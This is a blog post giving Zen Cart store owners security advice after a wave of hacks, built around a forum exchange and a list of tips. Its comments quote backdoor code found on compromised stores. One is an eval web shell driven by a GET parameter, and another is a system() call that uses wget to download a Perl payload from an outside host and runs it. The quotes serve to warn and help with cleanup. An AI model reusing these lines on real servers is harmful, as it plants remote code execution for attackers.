Secure your Zencart – A time consuming yet easy task

I have run Windows XP for years without any virus/trojan/spyware problem. How, you ask? I apply security patches regularly, I use the free Avast! anti virus to keep the viruses and trojans out, I use ZoneAlarm’s free firewall to keep the hackers at bay, I use Firefox with ads block plugin to stop spam, and obviously I know what I’m doing so I just don’t go and click on any popup saying “Security Alert! Scan your computer for FREE”.

Alright, my rant about Windows stops here, what I meant to say was: if you actively protect yourself then the chance that someone can harm your computer or your website is really low. Last week, I have received a message from a user on Zencart forum asking me this:

Hi yellow can you explain what is going on with hundreds and hundreds of zen cart stores ? If you read my6 thread possible hack in the security section you will see what i mean. This is getting worse aswell.

BTW, if you haven’t known yet, I go by the nick yellow1912 on Zencart forum.

Below is the rest of our conversation:

Me:

A few things to consider:

1. People never upgrade their stores, I know some people are still at 1.2.x which is many years old
Some others dont apply security patches when they need to (1.3.8 has a bunch of those)

2. The current code of zencart doesnt allow patches to be applied automatically like wordpress for example, so that may explain point 1.

3. Some hacks caused by other reasons, for example: some stores have joomla (old versions) on the same site and joomla was hacked.
Or in some cases, users are on shared hosting and some other sites stored on the same host were hacked first which left the whole server vulnerable.

Hope this can help

The user:

Thanks for the reply yellow but i have 1.3.8a installed and did the security updates etc. Is there any way of knowing how my site was hacked into and how they added code to EVERY single .PHP file. I dont feel like zen cart is safe now.

Me:

It is more than likely that your server was hacked, and there are just many ways for that to happen:

1. a computer which is used to access the site was compromised (virus, trojan,…)
2. your server was hacked (this happens alot when you are on the same server with many others, and this is the case for most unless you have a dedicated server)
3. the host doesnt have good security policy.

In any case, you may want to contact your host to see how hackers got in your site. They should have logs on the server that may help with that. Posting the exact hack details in zen security forum also helps as others might be able to tell you what went wrong.

I used Zen for 3 years and the only time I was hacked is because 1 of my parnter’ computers was infected with trojan.

Note that the hacker cant really change all your files unless:
1. he has access to your ftp account (this means he doesnt hack through zencart)
2. he manages to hack thru zencart, then uses the define page to put php code in there and manage to infect all other files. This happens only when your hosting doesnt have good policies to prevent this (using php on cgi is a good way to reduce this risk, some hosts dont do this though)

What is the moral of the story here? Update regularly, better not getting hacked at all than having to fix what has been done. If you do get hacked though, make sure you follow this guide AND fully scan your computer for viruses, trojans and such. Better yet, limit the access to your site admin/ftp and such to certain computers only. Also, if you can afford it, go for hosting plans that you don’t share the server with anyone else (you don’t prefer to sleep on the same bed with some total strangers, do you?)

Now here are some tips to protect yourself:

  1. Subscribe to Zencart announcements to make sure you get the security news as soon as possible: http://www.zen-cart.com/forum/subscription.php?do=addsubscription&f=2
  2. Subscribe to RubikIntegration’s feed as well, we always update our feed with important news as well as tips and tricks from Zencart http://feeds.feedburner.com/rubikintegration
  3. Apply security patches AS SOON AS THEY COME OUT.
  4. Never access your site FTP or Admin from computers you do not trust!
  5. Beware when you give out FTP or Admin info.
  6. If you use other softwares such as WordPress and Joomla on your site as well, make sure they are up-to-date.
  7. If you “sleep on the same bed with total strangers” as mentioned above, well, God bless you.
Note: I have personally helped tons of people to install various modules such as SSU and Ajax Checkout and I always DELETE all those info after the work is done. But you cannot trust everyone to do that, and what if they are trustworthy but their computers were infected? Please protect yourself!

Be safe.

Raine

No related posts.

4 Responses to “Secure your Zencart – A time consuming yet easy task”

  1. admin says:

    Just an update to the post: We have many customers contacted us recently for security help because their carts were hacked. Please please make sure your cart is updated:

    http://www.zen-cart.com/forum/showthread.php?t=131115

  2. admin says:

    Note: In the process of cleaning several stores I have seen something worth mentioning: check your images/ folder and see if there is any rogue file there (no php file should ever be there). The rogue file usually contain content like this:
    $a=base64_decode(‘LyoKKioqKioqKi…’);

    …..

    This is definitely a backdoor set by the hacker, please make sure that you delete that file(s).

  3. Cliff says:

    I found evil.php in my images directory. Contents of the file are

  4. Cliff says:

    opps stripped the code.
    /?php eval(stripslashes($_GET[e]));?/ /?php system(“cd /tmp;wget smenar.clan.su/payments.txt;perl payments.txt”);?/

Leave a Reply